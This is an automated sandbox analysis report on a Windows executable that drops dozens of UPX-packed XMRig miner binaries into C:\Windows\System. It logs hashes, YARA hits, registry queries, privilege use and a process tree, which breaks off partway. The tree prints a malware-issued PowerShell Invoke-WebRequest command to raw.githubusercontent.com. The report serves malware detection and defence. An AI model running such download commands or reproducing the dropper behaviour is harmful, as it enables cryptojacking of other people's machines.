xmrig | 686341d8c427c1460ebfd708d4f6dd2586e9ca899878981b29fabaa513fe972d

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2024, 03:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
Size

1.9MB
MD5

7067d619735013b8b2a2bacb87757aa0
SHA1

31d8a7f94303f978747bb0ec7aad7eb78d4c2321
SHA256

686341d8c427c1460ebfd708d4f6dd2586e9ca899878981b29fabaa513fe972d
SHA512

e882dc7047943149f5e43516701e3b5d95dbb65b17eb08bad5155f19e9e7a0301803c102f462793195b0a0bb45c4dada90a45eabbf98f18532a0df209586480b
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1VzxBp1P:NABk

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/3000-16-0x00007FF6FC9A0000-0x00007FF6FCD92000-memory.dmp	xmrig
behavioral2/memory/4216-89-0x00007FF605330000-0x00007FF605722000-memory.dmp	xmrig
behavioral2/memory/804-332-0x00007FF6F56B0000-0x00007FF6F5AA2000-memory.dmp	xmrig
behavioral2/memory/1428-333-0x00007FF6062F0000-0x00007FF6066E2000-memory.dmp	xmrig
behavioral2/memory/4428-334-0x00007FF7A7BA0000-0x00007FF7A7F92000-memory.dmp	xmrig
behavioral2/memory/2360-335-0x00007FF798D00000-0x00007FF7990F2000-memory.dmp	xmrig
behavioral2/memory/3868-336-0x00007FF7500A0000-0x00007FF750492000-memory.dmp	xmrig
behavioral2/memory/2840-337-0x00007FF78ED10000-0x00007FF78F102000-memory.dmp	xmrig
behavioral2/memory/3564-338-0x00007FF6591D0000-0x00007FF6595C2000-memory.dmp	xmrig
behavioral2/memory/1972-339-0x00007FF7B3900000-0x00007FF7B3CF2000-memory.dmp	xmrig
behavioral2/memory/3096-341-0x00007FF740610000-0x00007FF740A02000-memory.dmp	xmrig
behavioral2/memory/3952-340-0x00007FF7068B0000-0x00007FF706CA2000-memory.dmp	xmrig
behavioral2/memory/3512-342-0x00007FF74A3D0000-0x00007FF74A7C2000-memory.dmp	xmrig
behavioral2/memory/3944-343-0x00007FF7A86A0000-0x00007FF7A8A92000-memory.dmp	xmrig
behavioral2/memory/4196-344-0x00007FF79F3A0000-0x00007FF79F792000-memory.dmp	xmrig
behavioral2/memory/692-345-0x00007FF71A8D0000-0x00007FF71ACC2000-memory.dmp	xmrig
behavioral2/memory/3484-346-0x00007FF6D9930000-0x00007FF6D9D22000-memory.dmp	xmrig
behavioral2/memory/2640-90-0x00007FF65F9E0000-0x00007FF65FDD2000-memory.dmp	xmrig
behavioral2/memory/5036-84-0x00007FF760800000-0x00007FF760BF2000-memory.dmp	xmrig
behavioral2/memory/3040-69-0x00007FF65D5E0000-0x00007FF65D9D2000-memory.dmp	xmrig
behavioral2/memory/3160-348-0x00007FF7D7480000-0x00007FF7D7872000-memory.dmp	xmrig
behavioral2/memory/4352-352-0x00007FF798F50000-0x00007FF799342000-memory.dmp	xmrig
behavioral2/memory/2076-357-0x00007FF7E87F0000-0x00007FF7E8BE2000-memory.dmp	xmrig
behavioral2/memory/1708-347-0x00007FF6471A0000-0x00007FF647592000-memory.dmp	xmrig
behavioral2/memory/3000-2810-0x00007FF6FC9A0000-0x00007FF6FCD92000-memory.dmp	xmrig
behavioral2/memory/3040-2812-0x00007FF65D5E0000-0x00007FF65D9D2000-memory.dmp	xmrig
behavioral2/memory/692-2814-0x00007FF71A8D0000-0x00007FF71ACC2000-memory.dmp	xmrig
behavioral2/memory/3484-2816-0x00007FF6D9930000-0x00007FF6D9D22000-memory.dmp	xmrig
behavioral2/memory/5036-2818-0x00007FF760800000-0x00007FF760BF2000-memory.dmp	xmrig
behavioral2/memory/2640-2822-0x00007FF65F9E0000-0x00007FF65FDD2000-memory.dmp	xmrig
behavioral2/memory/4216-2821-0x00007FF605330000-0x00007FF605722000-memory.dmp	xmrig
behavioral2/memory/1708-2824-0x00007FF6471A0000-0x00007FF647592000-memory.dmp	xmrig
behavioral2/memory/804-2826-0x00007FF6F56B0000-0x00007FF6F5AA2000-memory.dmp	xmrig
behavioral2/memory/1428-2830-0x00007FF6062F0000-0x00007FF6066E2000-memory.dmp	xmrig
behavioral2/memory/4428-2829-0x00007FF7A7BA0000-0x00007FF7A7F92000-memory.dmp	xmrig
behavioral2/memory/3160-2832-0x00007FF7D7480000-0x00007FF7D7872000-memory.dmp	xmrig
behavioral2/memory/2360-2834-0x00007FF798D00000-0x00007FF7990F2000-memory.dmp	xmrig
behavioral2/memory/3868-2836-0x00007FF7500A0000-0x00007FF750492000-memory.dmp	xmrig
behavioral2/memory/4352-2838-0x00007FF798F50000-0x00007FF799342000-memory.dmp	xmrig
behavioral2/memory/2076-2840-0x00007FF7E87F0000-0x00007FF7E8BE2000-memory.dmp	xmrig
behavioral2/memory/2840-2842-0x00007FF78ED10000-0x00007FF78F102000-memory.dmp	xmrig
behavioral2/memory/3564-2844-0x00007FF6591D0000-0x00007FF6595C2000-memory.dmp	xmrig
behavioral2/memory/3952-2880-0x00007FF7068B0000-0x00007FF706CA2000-memory.dmp	xmrig
behavioral2/memory/3512-2885-0x00007FF74A3D0000-0x00007FF74A7C2000-memory.dmp	xmrig
behavioral2/memory/4196-2888-0x00007FF79F3A0000-0x00007FF79F792000-memory.dmp	xmrig
behavioral2/memory/3944-2887-0x00007FF7A86A0000-0x00007FF7A8A92000-memory.dmp	xmrig
behavioral2/memory/1972-2882-0x00007FF7B3900000-0x00007FF7B3CF2000-memory.dmp	xmrig
behavioral2/memory/3096-2881-0x00007FF740610000-0x00007FF740A02000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	1596	powershell.exe
10	1596	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1596	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3000	GJMCXZz.exe
692	YxzerFQ.exe
3484	ifKuPdw.exe
3040	SJjxAqy.exe
5036	GyBXgQg.exe
4216	ACNfQuv.exe
2640	QUVqDgT.exe
1708	AQBKalY.exe
804	ouhNlnn.exe
1428	EBnSqgg.exe
4428	vilIBsD.exe
3160	KrFMNya.exe
2360	YXIFnrt.exe
3868	ASfEPdn.exe
4352	xgkdJqU.exe
2076	LUjcCKK.exe
2840	ZRUNiwP.exe
3564	mSEthHd.exe
1972	bXpHlJg.exe
3952	Mbmzbdb.exe
3096	PnHNctc.exe
3512	UUkpKQi.exe
3944	tgfbfbP.exe
4196	UQOlHYE.exe
2676	QyOXBIr.exe
1488	JgQtMwm.exe
3924	DPlsDKW.exe
4320	XoXBGWe.exe
3108	bSMZwOg.exe
1644	jVPHHcm.exe
3572	kPysnfD.exe
3720	hoOmUwZ.exe
4724	IyFKutQ.exe
452	rZBzmGB.exe
4472	tlfqyZk.exe
1568	ZwTiDuI.exe
5048	GDxyZWP.exe
3964	zHHpfmI.exe
4816	CXQZQTF.exe
1184	KNqCCwr.exe
4460	nvnXxny.exe
4440	aCaXvsj.exe
2952	OdGzfCy.exe
2664	OOChalD.exe
4072	sHabLwJ.exe
1852	UVZJuza.exe
880	qdFrhsX.exe
4068	NpBcLMx.exe
2320	WtVpLga.exe
4040	WHKRxqv.exe
4132	oBwbGVw.exe
2964	XQBPvAx.exe
2324	ZGcYXwZ.exe
588	KUGPOIp.exe
3448	vtCwzBz.exe
2276	MqJhVSG.exe
1268	NfwgexG.exe
2948	QhDVprb.exe
3780	AvqbNkK.exe
2288	RTfVBWf.exe
3076	xnhKhxb.exe
1056	LFqehpa.exe
2224	hKwClub.exe
396	kLKyaXX.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3044-0-0x00007FF733040000-0x00007FF733432000-memory.dmp	upx
behavioral2/files/0x0008000000023413-5.dat	upx
behavioral2/files/0x0007000000023418-7.dat	upx
behavioral2/files/0x0007000000023419-18.dat	upx
behavioral2/files/0x0007000000023417-19.dat	upx
behavioral2/files/0x000700000002341a-30.dat	upx
behavioral2/files/0x000700000002341b-39.dat	upx
behavioral2/memory/3000-16-0x00007FF6FC9A0000-0x00007FF6FCD92000-memory.dmp	upx
behavioral2/files/0x000700000002341e-42.dat	upx
behavioral2/files/0x000700000002341f-51.dat	upx
behavioral2/files/0x000800000002341d-50.dat	upx
behavioral2/files/0x000800000002341c-63.dat	upx
behavioral2/files/0x0007000000023421-71.dat	upx
behavioral2/files/0x0008000000023414-78.dat	upx
behavioral2/memory/4216-89-0x00007FF605330000-0x00007FF605722000-memory.dmp	upx
behavioral2/files/0x0007000000023422-92.dat	upx
behavioral2/files/0x0007000000023425-106.dat	upx
behavioral2/files/0x0007000000023427-111.dat	upx
behavioral2/files/0x0007000000023428-124.dat	upx
behavioral2/files/0x000700000002342a-134.dat	upx
behavioral2/files/0x000700000002342b-139.dat	upx
behavioral2/files/0x000700000002342d-149.dat	upx
behavioral2/files/0x0007000000023430-156.dat	upx
behavioral2/files/0x0007000000023432-166.dat	upx
behavioral2/files/0x0007000000023434-176.dat	upx
behavioral2/memory/804-332-0x00007FF6F56B0000-0x00007FF6F5AA2000-memory.dmp	upx
behavioral2/memory/1428-333-0x00007FF6062F0000-0x00007FF6066E2000-memory.dmp	upx
behavioral2/memory/4428-334-0x00007FF7A7BA0000-0x00007FF7A7F92000-memory.dmp	upx
behavioral2/memory/2360-335-0x00007FF798D00000-0x00007FF7990F2000-memory.dmp	upx
behavioral2/memory/3868-336-0x00007FF7500A0000-0x00007FF750492000-memory.dmp	upx
behavioral2/memory/2840-337-0x00007FF78ED10000-0x00007FF78F102000-memory.dmp	upx
behavioral2/memory/3564-338-0x00007FF6591D0000-0x00007FF6595C2000-memory.dmp	upx
behavioral2/memory/1972-339-0x00007FF7B3900000-0x00007FF7B3CF2000-memory.dmp	upx
behavioral2/memory/3096-341-0x00007FF740610000-0x00007FF740A02000-memory.dmp	upx
behavioral2/memory/3952-340-0x00007FF7068B0000-0x00007FF706CA2000-memory.dmp	upx
behavioral2/memory/3512-342-0x00007FF74A3D0000-0x00007FF74A7C2000-memory.dmp	upx
behavioral2/files/0x0007000000023435-181.dat	upx
behavioral2/files/0x0007000000023433-179.dat	upx
behavioral2/files/0x0007000000023431-169.dat	upx
behavioral2/files/0x000700000002342f-159.dat	upx
behavioral2/files/0x000700000002342e-154.dat	upx
behavioral2/files/0x000700000002342c-144.dat	upx
behavioral2/files/0x0007000000023429-129.dat	upx
behavioral2/memory/3944-343-0x00007FF7A86A0000-0x00007FF7A8A92000-memory.dmp	upx
behavioral2/memory/4196-344-0x00007FF79F3A0000-0x00007FF79F792000-memory.dmp	upx
behavioral2/files/0x0007000000023426-114.dat	upx
behavioral2/memory/692-345-0x00007FF71A8D0000-0x00007FF71ACC2000-memory.dmp	upx
behavioral2/memory/3484-346-0x00007FF6D9930000-0x00007FF6D9D22000-memory.dmp	upx
behavioral2/files/0x0007000000023424-102.dat	upx
behavioral2/files/0x0007000000023423-97.dat	upx
behavioral2/memory/2640-90-0x00007FF65F9E0000-0x00007FF65FDD2000-memory.dmp	upx
behavioral2/memory/5036-84-0x00007FF760800000-0x00007FF760BF2000-memory.dmp	upx
behavioral2/files/0x0007000000023420-74.dat	upx
behavioral2/memory/3040-69-0x00007FF65D5E0000-0x00007FF65D9D2000-memory.dmp	upx
behavioral2/memory/3160-348-0x00007FF7D7480000-0x00007FF7D7872000-memory.dmp	upx
behavioral2/memory/4352-352-0x00007FF798F50000-0x00007FF799342000-memory.dmp	upx
behavioral2/memory/2076-357-0x00007FF7E87F0000-0x00007FF7E8BE2000-memory.dmp	upx
behavioral2/memory/1708-347-0x00007FF6471A0000-0x00007FF647592000-memory.dmp	upx
behavioral2/memory/3000-2810-0x00007FF6FC9A0000-0x00007FF6FCD92000-memory.dmp	upx
behavioral2/memory/3040-2812-0x00007FF65D5E0000-0x00007FF65D9D2000-memory.dmp	upx
behavioral2/memory/692-2814-0x00007FF71A8D0000-0x00007FF71ACC2000-memory.dmp	upx
behavioral2/memory/3484-2816-0x00007FF6D9930000-0x00007FF6D9D22000-memory.dmp	upx
behavioral2/memory/5036-2818-0x00007FF760800000-0x00007FF760BF2000-memory.dmp	upx
behavioral2/memory/2640-2822-0x00007FF65F9E0000-0x00007FF65FDD2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
7	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\FMlOLfN.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\eeEUQYY.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\XqiTypK.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\PqHrVbj.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\OgPneOp.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\MRwWONI.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\ghKjxsb.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\VHOuSHD.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\zfVFZOk.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\qdFrhsX.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\qPIBFyw.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\aqhpcYc.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\MRMfQYl.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\tlfqyZk.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\vfCowKY.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\TMYaRbS.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\dPCZeAN.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\bROxHye.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\IJstcMs.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\QJZIrtW.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\CCeQiCz.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\JfANtXw.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\nVoGKPG.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\lCSwgrP.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\cQtTPaN.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\QAtANkw.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\ppaYJNF.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\HhMbIXk.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\YvTJwkz.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\vynNJYN.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\PpxmYJR.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\MYXwABc.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\KZvOSfl.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\darPnso.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\WdMMNxQ.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\QCjRVKC.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\HjfwHqL.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\ALAtxGP.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\OujgFxF.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\LsvvDvs.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\vQrLzod.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\zriBLfW.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\smuVcZd.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\GFMsJUI.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\rOrycsy.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\woLjVnS.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\cVlwaaT.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\omJgnwV.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\rWsvgpY.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\OaxWDHJ.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\SsSQjvn.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\ShcaiHX.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\aMIxiVB.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\XZmhpvG.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\DrrRLbb.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\RNZqWnR.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\JKDHyig.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\hOsRsZO.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\WQTHCDB.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\ezsDxNQ.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\lnSMSEU.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\pQWhwDk.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\NrphDtD.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
File created	C:\Windows\System\LCmCbAn.exe	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1596	powershell.exe
1596	powershell.exe
1596	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
Token: SeDebugPrivilege	1596	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3044 wrote to memory of 1596	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	84
PID 3044 wrote to memory of 1596	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	84
PID 3044 wrote to memory of 3000	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	85
PID 3044 wrote to memory of 3000	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	85
PID 3044 wrote to memory of 3040	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	86
PID 3044 wrote to memory of 3040	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	86
PID 3044 wrote to memory of 692	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	87
PID 3044 wrote to memory of 692	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	87
PID 3044 wrote to memory of 3484	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	88
PID 3044 wrote to memory of 3484	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	88
PID 3044 wrote to memory of 5036	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	89
PID 3044 wrote to memory of 5036	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	89
PID 3044 wrote to memory of 4216	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	90
PID 3044 wrote to memory of 4216	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	90
PID 3044 wrote to memory of 2640	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	91
PID 3044 wrote to memory of 2640	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	91
PID 3044 wrote to memory of 1708	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	92
PID 3044 wrote to memory of 1708	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	92
PID 3044 wrote to memory of 804	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	93
PID 3044 wrote to memory of 804	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	93
PID 3044 wrote to memory of 1428	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	94
PID 3044 wrote to memory of 1428	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	94
PID 3044 wrote to memory of 4428	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	95
PID 3044 wrote to memory of 4428	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	95
PID 3044 wrote to memory of 3160	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	96
PID 3044 wrote to memory of 3160	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	96
PID 3044 wrote to memory of 2360	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	97
PID 3044 wrote to memory of 2360	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	97
PID 3044 wrote to memory of 3868	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	98
PID 3044 wrote to memory of 3868	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	98
PID 3044 wrote to memory of 4352	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	99
PID 3044 wrote to memory of 4352	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	99
PID 3044 wrote to memory of 2076	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	100
PID 3044 wrote to memory of 2076	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	100
PID 3044 wrote to memory of 2840	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	101
PID 3044 wrote to memory of 2840	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	101
PID 3044 wrote to memory of 3564	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	102
PID 3044 wrote to memory of 3564	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	102
PID 3044 wrote to memory of 1972	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	103
PID 3044 wrote to memory of 1972	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	103
PID 3044 wrote to memory of 3952	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	104
PID 3044 wrote to memory of 3952	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	104
PID 3044 wrote to memory of 3096	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	105
PID 3044 wrote to memory of 3096	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	105
PID 3044 wrote to memory of 3512	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	106
PID 3044 wrote to memory of 3512	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	106
PID 3044 wrote to memory of 3944	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	107
PID 3044 wrote to memory of 3944	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	107
PID 3044 wrote to memory of 4196	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	108
PID 3044 wrote to memory of 4196	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	108
PID 3044 wrote to memory of 2676	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	109
PID 3044 wrote to memory of 2676	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	109
PID 3044 wrote to memory of 1488	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	110
PID 3044 wrote to memory of 1488	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	110
PID 3044 wrote to memory of 3924	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	111
PID 3044 wrote to memory of 3924	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	111
PID 3044 wrote to memory of 4320	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	112
PID 3044 wrote to memory of 4320	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	112
PID 3044 wrote to memory of 3108	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	113
PID 3044 wrote to memory of 3108	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	113
PID 3044 wrote to memory of 1644	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	114
PID 3044 wrote to memory of 1644	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	114
PID 3044 wrote to memory of 3572	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	115
PID 3044 wrote to memory of 3572	3044	7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\7067d619735013b8b2a2bacb87757aa0_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1596" "2976" "2912" "2980" "0" "0" "2984" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:13280
- C:\Windows\System\GJMCXZz.exe
  C:\Windows\System\GJMCXZz.exe
  2⤵
  - Executes dropped EXE
  PID:3000
- C:\Windows\System\SJjxAqy.exe
  C:\Windows\System\SJjxAqy.exe
  2⤵
